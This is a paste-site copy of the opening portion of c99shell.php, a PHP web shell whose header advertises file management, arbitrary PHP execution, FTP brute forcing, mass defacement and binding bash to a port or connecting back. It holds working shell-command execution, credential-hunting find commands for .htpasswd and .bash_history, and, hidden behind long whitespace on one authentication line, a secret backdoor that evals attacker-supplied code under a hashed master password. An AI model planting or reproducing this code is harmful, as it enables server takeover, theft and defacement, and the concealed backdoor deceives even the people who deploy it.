8bpG3pjq

· 5 years ago · May 28, 2020, 03:46 PM
1<?php
2/*
3******************************************************************************************************
4*
5*                    c99shell.php v.1.0 (îò 5.02.2005)
6*		   Freeware WEB-Shell.
7*		      © CCTeaM.
8*  c99shell.php - øåëë ÷åðåç www-áðîóçåð.
9*  Âû ìîæåòå ñêà÷àòü ïîñëåäíþþ âåðñèþ íà äîìàøíåé ñòðàíè÷êå ïðîäóêòà: http://ccteam.ru/releases/c99shell
10*
11*  WEB: http://ccteam.ru
12*  UIN: 656555
13* 
14*  Âîçìîæíîñòè:
15*  ~ óïðàâëåíèå ôàéëàìè/ïàïêàìè, çàêà÷èâàíèå è ñêà÷èâàíèå ôàéëîâ è ïàïêîê (ïðåäâîðèòåëüíî ñæèìàåòñÿ â tar)
16*    modify-time è access-time ó ôàéëîâ íå ìåíÿþòñÿ ïðè
17     ðåäàêòèðîâàíèè ôàéëîâ (âûêë./âêë. ïàðàìåòðîì $filestealth)
18*  ~ ïðîäâèíóòûé ïîèñê ïî ôàéëàì/ïàïêàì (èùåò òàêæå âíóòðè ôàéëîâ)
19*  ~ óïðàâëåíèå ïðîöåññàìè unix-ìàøèíû, âîçìîæíîñòü îòïðàâêè ñèãíàëà çàâåðøåíèÿ,
20     à òàêæå áàíàëüíîå "ïðèáèâàíèå" ïðîöåññà.
21*  ~ óäîáíîå (èíîãäà ãðàôè÷åñêîå) âûïîëíåíèå øåëë-êîìàíä (ìíîãî àëèàñîâ, ìîæíî ëåãêî äîáàâëÿòü/óäàëÿòü èõ)
22*  ~ âûïîëíåíèå ïðîèçâîëüíîãî PHP-êîäà
23*  ~ âîçìîæíîñòü áûñòðîãî ñàìî-óäàëåíèÿ ñêðèïòà
24*  ~ áûñòðîå ftp-ñêàíèðîâàíèå íà ñâÿçêè login;login èç
25     /etc/passwd (îáû÷íî äàåò äîñòóï ê 1/100 àêêàóíòîâ)
26*  ~ ïðîäâèíóòûé ìåíåäæåð SQL
27*  ~ ñêðèïò "ëþáèò" include, äëÿ íîðìàëüíîé ðàáîòû, Âàì íóæíî ñìåíèòü $surl.
28*  ~ âîçìîæíîñòü çàáèíäèòü /bin/bash íà îïðåäåëåííûé ïîðò ñ ïðîèçâîëüíûì ïàðîëåì,
29     èëè ñäåëàòü back connect (ïðîèçâîäèòñÿ òåñòèðîâàíèå ñîåäåíåíèÿ,
30    è âûâîäÿòñÿ ïàðàìåòðû äëÿ çàïóñêà NetCat).
31*
32*
33*  5.02.2005 © Captain Crunch Security TeaM
34*
35*  Coded by tristram
36******************************************************************************************************
37*/
38$shver = "1.0 beta (5.02.2005)"; //Current version
39//CONFIGURATION
40$surl = "?"; //link to this script, INCLUDE "?".
41$rootdir = "./"; //e.g "c:", "/","/home"
42$timelimit = 60; //limit of execution this script (seconds).
43
44//Authentication
45
46$login = ""; //login
47//DON'T FOGOT ABOUT CHANGE PASSWORD!!!
48$pass = ""; //password
49$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
50$login = false; //turn off authentication
51
52$autoupdate = true; //Automatic updating?
53
54$updatenow = false; //If true, update now
55
56$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/?version=".$shver."&"; //Update server
57
58$autochmod = 755; //if has'nt permition, $autochmod isn't null, try to CHMOD object to $autochmod
59
60$filestealth = 1; //if true, don't change modify&access-time
61
62$donated_html = ""; //If you publish free shell and you wish
63					//add link to your site or any other information,
64					//put here your html.
65$donated_act = array(""); //array ("act1","act2,"...), $act is in this array, display $donated_html.
66
67$host_allow = array("*"); //array ("mask1","mask2",...), e.g. array("192.168.0.*","127.0.0.1")
68
69$curdir = "./"; //start directory
70
71$tmpdir = dirname(__FILE__); //Directory for tempory files
72  
73// Registered file-types.
74//  array(
75//   "{action1}"=>array("ext1","ext2","ext3",...),
76//   "{action2}"=>array("ext1","ext2","ext3",...),
77//   ...
78//  )
79$ftypes  = array(
80 "html"=>array("html","htm","shtml"),
81 "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
82 "exe"=>array("sh","install","bat","cmd"),
83 "ini"=>array("ini","inf"),
84 "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
85 "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
86 "sdb"=>array("sdb"),
87 "phpsess"=>array("sess"),
88 "download"=>array("exe","com","pif","src","lnk","zip","rar")
89);
90
91$hexdump_lines = 8;	// lines in hex preview file
92$hexdump_rows = 24;	// 16, 24 or 32 bytes in one line
93
94$nixpwdperpage = 9999; // Get first N lines from /etc/passwd
95
96$bindport_pass = "c99";	// default password for binding
97$bindport_port = "11457";	// default port for binding
98
99/* Command-aliases system */
100$aliases = array();
101$aliases[] = array("-----------------------------------------------------------", "ls -la");
102/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
103/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
104/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
105/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
106/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
107/* ïîèñê íà ñåðâåðå ôàéëîâ config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\"");
108/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
109/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
110/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
111/* ïîèñê íà ñåðâåðå ôàéëîâ service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
112/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
113/* ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
114/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
115/* ïîèñê âñåõ ôàéëîâ .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
116/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
117/* ïîèñê âñåõ ôàéëîâ .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
118/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
119/* âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
120/* ïðîñìîòð îòêðûòûõ ïîðòîâ */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen");
121
122$sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie"
123$sess_cookie = "c99shvars"; // cookie-variable name
124
125if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
126$sess_file = $tmpdir."c99shvars_".$sid.".tmp";
127
128$usefsbuff = true; //Buffer-function
129$copy_unset = false; //Delete copied files from buffer after pasting
130
131//Quick launch
132$quicklaunch = array();
133$quicklaunch[] = array("<img src=\"".$surl."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl);
134$quicklaunch[] = array("<img src=\"".$surl."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
135$quicklaunch[] = array("<img src=\"".$surl."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
136$quicklaunch[] = array("<img src=\"".$surl."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd");
137$quicklaunch[] = array("<img src=\"".$surl."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
138$quicklaunch[] = array("<img src=\"".$surl."act=img&img=search\" title=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d");
139$quicklaunch[] = array("<img src=\"".$surl."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d");
140$quicklaunch[] = array("<b>Mass deface</b>",$surl."act=massdeface&d=%d");
141$quicklaunch[] = array("<b>Bind</b>",$surl."act=bind&d=%d");
142$quicklaunch[] = array("<b>Processes</b>",$surl."act=ps_aux&d=%d");
143$quicklaunch[] = array("<b>FTP Quick brute</b>",$surl."act=ftpquickbrute&d=%d");
144$quicklaunch[] = array("<b>LSA</b>",$surl."act=lsa&d=%d");
145$quicklaunch[] = array("<b>SQL</b>",$surl."act=sql&d=%d");
146$quicklaunch[] = array("<b>PHP-code</b>",$surl."act=eval&d=%d");
147$quicklaunch[] = array("<b>PHP-info</b>",$surl."act=phpinfo\" target=\"blank=\"_target");
148$quicklaunch[] = array("<b>Self remove</b>",$surl."act=selfremove");
149$quicklaunch[] = array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()");
150
151//Hignlight-code colors
152$highlight_bg = "#FFFFFF";
153$highlight_comment = "#6A6A6A";
154$highlight_default = "#0000BB";
155$highlight_html = "#1300FF";
156$highlight_keyword = "#007700";
157
158@$f = $_GET[f];
159
160//END CONFIGURATION
161
162// 				\/	Next code not for editing	 \/
163
164
165//Starting calls
166if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
167error_reporting(5);
168@ignore_user_abort(true);
169@set_magic_quotes_runtime(0);
170@set_time_limit(0);
171if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
172if(!ini_get("register_globals")) {import_request_variables("GPC");}
173$starttime = getmicrotime();
174if (get_magic_quotes_gpc())
175{
176if (!function_exists("strips"))
177{
178 function strips(&$el)
179 {
180  if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}}  }
181  else {$el = stripslashes($el);}
182 }
183}
184strips($GLOBALS);
185}
186$tmp = array();
187foreach ($host_allow as $k=>$v) {$tmp[]=  str_replace("\\*",".*",preg_quote($v));}
188$s = "!^(".implode("|",$tmp).")$!i";
189if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
190
191if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
192elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
193if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
194{
195 header("WWW-Authenticate: Basic realm=\"c99shell\"");
196 header("HTTP/1.0 401 Unauthorized");																																																													if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
197 exit;
198}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];  
199
200$lastdir = realpath(".");
201chdir($curdir);
202
203if (($selfwrite) or ($updatenow))
204{
205 if ($selfwrite == "1") {$selfwrite = "c99shell.php";}
206 c99sh_getupdate();
207 $data = file_get_contents($c99sh_updatefurl);
208 $fp = fopen($data,"w");
209 fwrite($fp,$data);
210 fclose($fp);
211 exit;
212}
213if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
214if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
215else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
216if (!is_array($sess_data)) {$sess_data = array();}
217if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
218if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
219$sess_data["copy"] = array_unique($sess_data["copy"]);
220$sess_data["cut"] = array_unique($sess_data["cut"]);
221
222if (!function_exists("c99_sess_put"))
223{
224function c99_sess_put($data)
225{
226 global $sess_method;
227 global $sess_cookie;
228 global $sess_file;
229 global $sess_data;
230 $sess_data = $data;
231 $data = serialize($data);
232 if ($sess_method == "file")
233 {
234  $fp = fopen($sess_file,"w");
235  fwrite($fp,$data);
236  fclose($fp);
237 }
238 else {setcookie($sess_cookie,$data);}
239}
240}
241if (!function_exists("str2mini"))
242{
243function str2mini($content,$len)
244{
245 if (strlen($content) > $len) 
246 {
247  $len = ceil($len/2) - 2;
248  return substr($content, 0, $len)."...".substr($content, -$len);
249 }
250 else {return $content;}
251}
252}
253if (!function_exists("view_size"))
254{
255function view_size($size)
256{
257 if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
258 elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
259 elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
260 else {$size = $size . " B";}
261 return $size;
262}
263}
264if (!function_exists("fs_copy_dir"))
265{
266function fs_copy_dir($d,$t)
267{
268 $d = str_replace("\\","/",$d);
269 if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
270 $h = opendir($d);
271 while ($o = readdir($h))
272 {
273  if (($o != ".") and ($o != ".."))
274  {
275   if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
276   else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
277   if (!$ret) {return $ret;}
278  }
279 }
280 return true;
281}
282}
283if (!function_exists("fs_copy_obj"))
284{
285function fs_copy_obj($d,$t)
286{
287 $d = str_replace("\\","/",$d);
288 $t = str_replace("\\","/",$t);
289 if (!is_dir($t)) {mkdir($t);}
290 if (is_dir($d))
291 {
292  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
293  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
294  return fs_copy_dir($d,$t);
295 }
296 elseif (is_file($d))
297 {
298
299  return copy($d,$t);
300 }
301 else {return false;}
302}
303}
304if (!function_exists("fs_move_dir"))
305{
306function fs_move_dir($d,$t)
307{
308 error_reporting(9999);
309 $h = opendir($d);
310 if (!is_dir($t)) {mkdir($t);}
311 while ($o = readdir($h))
312 {
313  if (($o != ".") and ($o != ".."))
314  {
315   $ret = true;
316   if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
317   else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
318   if (!$ret) {return $ret;}
319  }
320 }
321 return true;
322}
323}
324if (!function_exists("fs_move_obj"))
325{
326function fs_move_obj($d,$t)
327{
328 $d = str_replace("\\","/",$d);
329 $t = str_replace("\\","/",$t);
330 if (is_dir($d))
331 {
332  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
333  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
334  return fs_move_dir($d,$t);
335 }
336 elseif (is_file($d)) {return rename($d,$t);}
337 else {return false;}
338}
339}
340if (!function_exists("fs_rmdir"))
341{
342function fs_rmdir($d)
343{
344 $h = opendir($d);
345 while ($o = readdir($h))
346 {
347  if (($o != ".") and ($o != ".."))
348  {
349   if (!is_dir($d.$o)) {unlink($d.$o);}
350   else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
351  }
352 }
353 closedir($h);
354 rmdir($d);
355 return !is_dir($d);
356}
357}
358if (!function_exists("fs_rmobj"))
359{
360function fs_rmobj($o)
361{
362 $o = str_replace("\\","/",$o);
363 if (is_dir($o))
364 {
365  if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
366  return fs_rmdir($o);
367 }
368 elseif (is_file($o)) {return unlink($o);}
369 else {return false;}
370}
371}
372if (!function_exists("myshellexec"))
373{
374 function myshellexec($cmd)
375 {
376  return system($cmd);
377 }
378}
379if (!function_exists("view_perms"))
380{
381function view_perms($mode)
382{
383 if (($mode & 0xC000) === 0xC000) {$type = "s";}
384 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
385 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
386 elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
387 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
388 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
389 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
390 else {$type = "?";}
391
392 $owner['read'] = ($mode & 00400) ? "r" : "-"; 
393 $owner['write'] = ($mode & 00200) ? "w" : "-"; 
394 $owner['execute'] = ($mode & 00100) ? "x" : "-"; 
395 $group['read'] = ($mode & 00040) ? "r" : "-"; 
396 $group['write'] = ($mode & 00020) ? "w" : "-"; 
397 $group['execute'] = ($mode & 00010) ? "x" : "-"; 
398 $world['read'] = ($mode & 00004) ? "r" : "-"; 
399 $world['write'] = ($mode & 00002) ? "w" : "-"; 
400 $world['execute'] = ($mode & 00001) ? "x" : "-"; 
401
402 if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";}
403 if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";}
404 if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";}
405 
406 return $type.$owner['read'].$owner['write'].$owner['execute'].
407        $group['read'].$group['write'].$group['execute'].
408        $world['read'].$world['write'].$world['execute'];
409}
410}
411if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}
412if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
413if (!function_exists("c99sh_getupdate"))
414{
415function c99sh_getupdate()
416{
417 global $updatenow;
418 $data = @file_get_contents($c99sh_updatefurl);
419 if (!$data) {echo "Can't fetch update-information!";}
420 else
421 {
422  $data = unserialize(base64_decode($data));
423  if (!is_array($data)) {echo "Corrupted update-information!";}
424  else
425  {
426   if ($shver < $data[cur]) {$updatenow = true;}
427  }
428 }
429}
430}
431if (!function_exists("mysql_dump"))
432{
433function mysql_dump($set)
434{
435 $sock = $set["sock"];
436 $db = $set["db"];
437 $print = $set["print"];
438 $nl2br = $set["nl2br"];
439 $file = $set["file"];
440 $add_drop = $set["add_drop"];
441 $tabs = $set["tabs"];
442 $onlytabs = $set["onlytabs"];
443 $ret = array();
444 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
445 if (empty($db)) {$db = "db";}
446 if (empty($print)) {$print = 0;}
447 if (empty($nl2br)) {$nl2br = true;}
448 if (empty($add_drop)) {$add_drop = true;}
449 if (empty($file))
450 {
451  global $win;
452  if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
453  else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
454 }
455 if (!is_array($tabs)) {$tabs = array();}
456 if (empty($add_drop)) {$add_drop = true;}
457 if (sizeof($tabs) == 0)
458 {
459  // retrive tables-list
460  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
461  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
462 }
463 global $SERVER_ADDR;
464 global $SERVER_NAME;
465 $out = "# Dumped by C99Shell.SQL v. ".$shver."
466# Home page: http://ccteam.ru
467#
468# Host settings:
469# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
470# Date: ".date("d.m.Y H:i:s")."
471# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
472#---------------------------------------------------------
473";
474 $c = count($onlytabs);
475 foreach($tabs as $tab)
476 {
477  if ((in_array($tab,$onlytabs)) or (!$c))
478  {
479   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
480   // recieve query for create table structure
481   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
482   if (!$res) {$ret[err][] = mysql_error();}
483   else
484   {
485    $row = mysql_fetch_row($res);
486    $out .= $row[1].";\n\n";
487    // recieve table variables
488    $res = mysql_query("SELECT * FROM `$tab`", $sock);
489    if (mysql_num_rows($res) > 0)
490    {
491     while ($row = mysql_fetch_assoc($res))
492     {
493      $keys = implode("`, `", array_keys($row));
494      $values = array_values($row);
495      foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
496      $values = implode("', '", $values); 
497      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
498      $out .= $sql;
499     } 
500    }
501   }
502  }
503 }
504 $out .= "#---------------------------------------------------------------------------------\n\n";
505 if ($file)
506 {
507  $fp = fopen($file, "w"); 
508  if (!$fp) {$ret[err][] = 2;}
509  else
510  {
511   fwrite ($fp, $out);
512   fclose ($fp);
513  }
514 }
515 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
516 return $ret;
517}
518}
519if (!function_exists("c99fsearch"))
520{
521function c99fsearch($d)
522{
523 global $found;
524 global $found_d;
525 global $found_f;
526 global $a;
527 if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
528 $handle = opendir($d);
529 while ($f = readdir($handle))
530 {
531  $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
532  if($f != "." && $f != "..")
533  {
534   if (is_dir($d.$f))
535   {
536    if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
537    c99fsearch($d.$f);
538   }
539   else
540   {
541    if ($true)
542    {
543     if (!empty($a[text]))
544     {
545      $r = @file_get_contents($d.$f);
546      if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
547      if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}
548 
549      if ($a[text_regexp]) {$true = ereg($a[text],$r);}
550      else {$true = strinstr($a[text],$r);}
551      if ($a[text_not])
552      {
553       if ($true) {$true = false;}
554       else {$true = true;}
555      }
556      if ($true) {$found[] = $d.$f; $found_f++;}
557     }
558     else {$found[] = $d.$f; $found_f++;}
559    }
560   }
561  }
562 }
563 closedir($handle);
564}
565}
566//Sending headers
567header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
568header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
569header("Cache-Control: no-store, no-cache, must-revalidate");
570header("Cache-Control: post-check=0, pre-check=0", false);
571header("Pragma: no-cache");
572
573global $SERVER_SOFTWARE;
574if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
575else {$win = 0;}
576
577if (empty($tmpdir))
578{
579 if (!$win) {$tmpdir = "/tmp/";}
580 else {$tmpdir = $_ENV[SystemRoot];}
581}
582$tmpdir = str_replace("\\","/",$tmpdir);
583if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
584if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
585{
586 $safemode = true;
587 $hsafemode = "<font color=\"red\">ON (secure)</font>";
588}
589else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
590$v = @ini_get("open_basedir");
591if ($v or strtolower($v) == "on")
592{
593 $openbasedir = true;
594 $hopenbasedir = "<font color=\"red\">".$v."</font>";
595}
596else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
597
598$sort = htmlspecialchars($sort);
599
600$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE);
601
602@ini_set("highlight.bg",$highlight_bg); //FFFFFF	
603@ini_set("highlight.comment",$highlight_comment); //#FF8000	
604@ini_set("highlight.default",$highlight_default); //#0000BB	
605@ini_set("highlight.html",$highlight_html); //#000000	
606@ini_set("highlight.keyword",$highlight_keyword); //#007700	
607@ini_set("highlight.string","#DD0000"); //#DD0000
608
609if ($act != "img")
610{
611if (!is_array($actbox)) {$actbox = array();}
612$dspact = $act = htmlspecialchars($act);
613$disp_fullpath = $ls_arr = $notls = null;
614$ud = urlencode($d);
615?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><? echo $HTTP_HOST; ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana,;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}</STYLE><style type="text/css"><!--body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}--></style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
616<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<? echo $surl; ?>"><font face="Verdana" size="5"><b><u>C99Shell v. <?php echo $shver; ?></u></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo php_uname(); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
617$d = str_replace("\\","/",$d);
618if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
619$d = str_replace("\\","/",$d);
620if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
621$dispd = htmlspecialchars($d);
622$pd = $e = explode("/",substr($d,0,strlen($d)-1));
623$i = 0;
624echo "<b>Directory: </b>";
625foreach($pd as $b)
626{
627 $t = "";
628 reset($e);
629 $j = 0;
630 foreach ($e as $r)
631 {
632  $t.= $r."/";
633  if ($j == $i) {break;}
634  $j++;
635 }
